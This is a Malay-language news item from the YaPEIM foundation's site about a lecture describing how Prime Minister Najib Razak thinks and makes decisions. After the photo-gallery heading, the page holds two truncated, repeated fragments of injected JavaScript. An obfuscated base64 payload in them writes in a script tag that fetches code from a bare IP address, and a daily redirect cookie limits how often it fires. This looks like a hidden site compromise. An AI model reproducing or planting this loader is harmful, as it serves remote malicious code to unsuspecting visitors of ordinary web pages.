YaPEIM » Cara berfikir Najib setajam Dr Mahathir

Terkini

Cara berfikir Najib setajam Dr Mahathir

Talk Bagaimana Dato’ Seri Najib Berfikir yang disampaikan oleh Pengarah Strategik Pejabat Perdana Menteri, Datuk Shahlan Ismail

KUALA LUMPUR: Cara berfikir Datuk Seri Mohd NajibTun Razak yang cenderung mendengar pelbagai pendapat dan membuat keputusan berasaskan pendapat yang tepat, hampir sama dengan cara berfikir  Dr Mahathir Mohamad.

Pengarah Strategik Pejabat Perdana Menteri, Datuk Shahlan Ismail, berkata Perdana Menteri selalunya suka kepada seseorang yang bukan hanya menceritakan masalah semata-mata, sebaliknya turut memberi beberapa cadangan penyelesaian.

Berucap dalam satu siri syarahan bertajuk ‘Bagaimana Cara Berfikir Datuk Seri Mohd Najib Tun Razak’  anjuran Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM), Shahlan berkata Najib ialah seorang tegas dan dalam masa sama seorang akomodatif.

“Beliau mewarisi personaliti dan cara berfikir ayahandanya Tun Abdul Razak Hussein yang mempunyai kemahiran mendengar yang sangat baik.  Ini membolehkan beliau memahami isu atau persoalan dan boleh membuat kesimpulan yang tepat.”

“Seperti sesiapa yang mengenali Tun Abdul Razak, orang ramai yang berjumpanya akan berpuas hati walaupun permintaan orang itu tidak berjaya dipenuhi sepenuhnya kerana sebab-sebab tertentu,” katanya di Dewan Utama Ibu Pejabat YaPEIM di sini, petang semalam.

Turut hadir Presiden & Pengerusi Lembaga Pemegang Amanah YaPEIM, Datuk Abdul Malek Awang Kechil; Ketua Pengarah YaPEIM, Abibullah Samsudin dan pegawai-pegawai utama yayasan berkenaan.

Shahlan berkata, Perdana Menteri mahukan sesuatu tugas yang diberikan kepada seseorang atau pegawainya, diselesaikan daripada awal hingga kepada penyelesaiaian hingga tak berbangkit lagi masalah itu.

“Dia memberi kepercayaan kepada pegawainya dan jangan sesuatu masalah itu muncul kembali untuk dia sendiri perlu menyelesaikannya,” katanya.

Menjelaskan mengenai program transformasi yang bertemakan ‘rakyat didahulu, pencapaian diutamakan’, Shahlan berkata program transformasi berkaitan dengan mengubah cara  atau sistem penyapaian.

“Berlakunya perubahan total kepada cara penyampaian akan membolehkan orang ramai berpuas hati dengan perkhidmatan yang diberikan, dan ini akan menyebabkan rakyat merasakan mereka dilayan dengan sempurna,” katanya.

Sementara itu, Presiden YaPEIM Abdul Malek berkata, syarahan Bagaimana Cara Berfikir Dato Sri Mohd Najib Tun Razak adalah bertujuan untuk mengenali lebih dekat ketokohan Perdana Menteri  dan bagaimana tokoh ini berfikir dalam memperkenalkan gagasan,  dasar-dasar dan program dalam memajukan negara.

“Kita perlu  mengenali Perdana Menteri secara komprehensif dengan melihat kekuatan-kekuatan yang ada pada beliau.

Beliau seterusnya menyarankan bahawa  kita perlu mengenali dan memahami Datuk Seri Najib secara lebih dekat, kerana Pepatah melayu pun menyatakan bahawa “Tak kenal maka tak cinta”.

“Mengetahui bagaimana cara berfikir Dato’ Sri Perdana Menteri sangat penting untuk kita akhirnya dapat menghargai peranan dan  jasa yang telah beliau tumpahkan demi pembangunan ummah dan negara,” katanya.

Galeri Gambar

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top